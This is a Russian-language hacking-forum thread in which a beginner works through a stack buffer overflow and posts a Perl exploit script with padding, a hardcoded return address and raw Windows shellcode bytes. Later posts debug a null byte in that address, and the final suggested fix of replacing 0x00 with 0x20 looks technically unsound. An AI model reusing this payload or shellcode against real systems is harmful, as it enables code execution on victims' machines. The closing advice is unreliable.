_wikipedia.org/wiki/Переполнение_буфера так же на wasm.ru есть статьи... юзайте поиск... _wasm.ru/article.php?article=1020001
в том то й проблема что ето только теория а кат ето использовать,написать сплоит? поиоему там об етом ничево нету.
сенкс понял только никак незапущу шелкод на исполнения. получается вот такая хрень вбиваю 28 букв затем адрес возврата. в Olly видна как оно переходит на адрес возврата. затем питаюсь вбить експлоит после адреса возврата но он затрагивает адрес возврата.што делать непойму.
ТС, вот для кого грейт старался, писал статью, все разъяснял, с примерами, а? Неужели так трудно заюзать поиск по форуму? http://forum.antichat.ru/thread26791.html
разобрался только неможу вбить правельний адрес возврата. вбиваю "\x40\xfb\x22\x00" а оно вместо первих нулей пишет 20. што делать подскажите.
Ладно обясню по подробней. есть мой exploit на Perl: #!perl $Poc = "\x61" x28; $returnadr = "\x40\xfb\x22\x00"; $shellcode = "\x33\xC0\xB8\x8F". "\x7A\x83\x7C\x68". "\x00\x04\x00\x00". "\x68\x00\x03\x00". "\x00\xFF\xD0\x33". "\xC0\xB8\xFA\xCA". "\x81\x7C\xFF\xD0"; print "$Poc$returnadr$shellcode";. загвоздка в том што строка "\x40\xfb\x22\x00" должна давать адрес возврата 0022fb40,а она почемуто вместо етаво дайот 2022fb40. тоесть "\x00" принимаетса за 20 ходя должно приниматса за 00.
смини в стрроке \x40\xfb\x22\x00 на \x40\xfb\x22\x20 и все будит ok зы: сначала прочол тему как у мня "переполнение мочевого пузыря" г г г
